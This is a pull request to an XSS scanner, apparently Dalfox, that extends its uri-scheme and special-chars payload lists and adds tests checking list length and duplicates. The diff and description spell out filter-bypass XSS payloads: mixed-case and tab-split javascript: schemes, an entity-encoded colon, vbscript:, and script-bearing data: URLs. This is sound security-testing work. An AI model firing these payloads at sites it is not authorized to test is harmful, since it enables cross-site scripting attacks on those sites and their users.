### PR TITLE
Expand the uri-scheme and special-chars payload lists

### DIFF
--- a/src/cmd/payload.rs
+++ b/src/cmd/payload.rs
@@ -39,7 +39,20 @@ pub struct PayloadArgs {
 fn uri_scheme_payloads() -> &'static [&'static str] {
     &[
         "javascript:alert(1)",
+        // Comment terminator swallows anything appended after the injection.
+        "javascript:alert(1)//",
+        // Mixed case defeats a naive lowercase `javascript` scheme match.
+        "jaVasCript:alert(1)",
+        // Literal TAB inside the scheme; URL parsers strip TAB/LF/CR, so a
+        // filter that misses it still resolves the scheme to `javascript:`.
+        "java\tscript:alert(1)",
+        // Entity-encoded colon; decodes back to `:` in an HTML attribute.
+        "javascript&colon;alert(1)",
+        // Legacy IE scheme, still worth probing on old surfaces.
+        "vbscript:msgbox(1)",
         "data:text/html;,<svg/onload=alert(1)>",
+        // Plain (non-base64) data URL, distinct from the encoded variants below.
+        "data:text/html,<script>alert(1)</script>",
         "data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoNDUpPg==",
         "data:application/xml;base64,PGhhaHd1bDpzY3JpcHQgeG1sbnM6aGFod3VsPSdodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sJz5wcm9tcHQoNDUpPC9oYWh3dWw6c2NyaXB0Pg==",
         "data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KDQ1KTs8L3NjcmlwdD48L3N2Zz4=",
@@ -59,7 +72,8 @@ fn special_chars_payloads() -> &'static [&'static str] {
         // URL-encoded variants
         "%3C", "%3E", "%22", "%27", "%60", "%28", "%29", // Double URL-encoded
         "%253C", "%253E", // Unicode escapes (JS string context)
-        "\\u003c", "\\u003e", "\\x3c", "\\x3e",
+        "\\u003c", "\\u003e", "\\x3c", "\\x3e", // Comment openers and the null byte
+        "//", "/*", "%00",
     ]
 }
 

--- a/src/cmd/payload/tests.rs
+++ b/src/cmd/payload/tests.rs
@@ -7,9 +7,27 @@ use crate::cmd::scan::ScanOutcome;
 #[test]
 fn test_uri_scheme_payloads_shape() {
     let payloads = uri_scheme_payloads();
-    assert_eq!(payloads.len(), 5);
+    assert_eq!(payloads.len(), 11);
     assert!(payloads.iter().any(|p| p.starts_with("javascript:")));
     assert!(payloads.iter().all(|p| !p.is_empty()));
+}
+
+#[test]
+fn test_curated_selector_lists_have_no_duplicates() {
+    for (name, list) in [
+        ("uri-scheme", uri_scheme_payloads()),
+        ("special-chars", special_chars_payloads()),
+    ] {
+        let mut seen = std::collections::HashSet::new();
+        for entry in list {
+            assert!(
+                seen.insert(*entry),
+                "{} has a duplicate entry: {:?}",
+                name,
+                entry
+            );
+        }
+    }
 }
 
 #[test]


### PR DESCRIPTION
## Summary

`dalfox payload uri-scheme` and `dalfox payload special-chars` back manual context-probing. This adds nine well-known, distinct variants.

`uri-scheme` (5 -> 11):

```
javascript:alert(1)//              comment terminator, swallows trailing junk
jaVasCript:alert(1)                mixed case, defeats a lowercase scheme match
java<TAB>script:alert(1)           literal TAB; parsers strip TAB/LF/CR from the scheme
javascript&colon;alert(1)          entity-encoded colon, decodes in an HTML attribute
vbscript:msgbox(1)                 legacy IE scheme
data:text/html,<script>alert(1)</script>   plain data: URL, distinct from the base64 ones
```

`special-chars` (40 -> 43): `//`, `/*`, `%00`.

## Context

Fixes #1335.

## Changes

- `uri_scheme_payloads()` and `special_chars_payloads()` in `src/cmd/payload.rs` gain the entries above, with a short comment per group in the existing style.
- `test_uri_scheme_payloads_shape` count updated 5 -> 11.
- New `test_curated_selector_lists_have_no_duplicates` covers the issue's third acceptance criterion for both lists.

## Testing

```
cargo test          2416 passed, 0 failed
cargo fmt --all -- --check                 clean
cargo clippy --all-targets --all-features -- -D warnings    0 warnings
crystal run scripts/surface_parity.cr      46 passed
```

The literal TAB entry prints intact (`java\tscript:alert(1)`), verified with `dalfox payload uri-scheme | cat -vte`.

Mutation check on the two load-bearing assertions. Injecting a duplicate `%00` fails `test_curated_selector_lists_have_no_duplicates` with `special-chars has a duplicate entry: "%00"`; removing a uri entry fails `test_uri_scheme_payloads_shape` on the count.

These are known filter-bypass variants from public literature. What I verified is that they print correctly and are distinct, not that each fires in a given browser.

## Notes for reviewers

`special-chars` got 3 entries rather than the fuller set the issue sketched. rustfmt reflows that hand-packed array to one-per-line once it passes ~43 elements, which would churn ~40 unrelated lines. I kept the additions under that threshold to preserve the current formatting. Happy to add `&NewLine;`, `&Tab;`, `*/`, `<!--`, `-->` too if you are fine with the array reflowing to one entry per line.

#1346 (`all` selector), #1348 (per-selector counts) and #1343 (`--json`) also touch `src/cmd/payload.rs`. Branched off `main`, so this merges in any order; whoever lands last gets a small rebase.
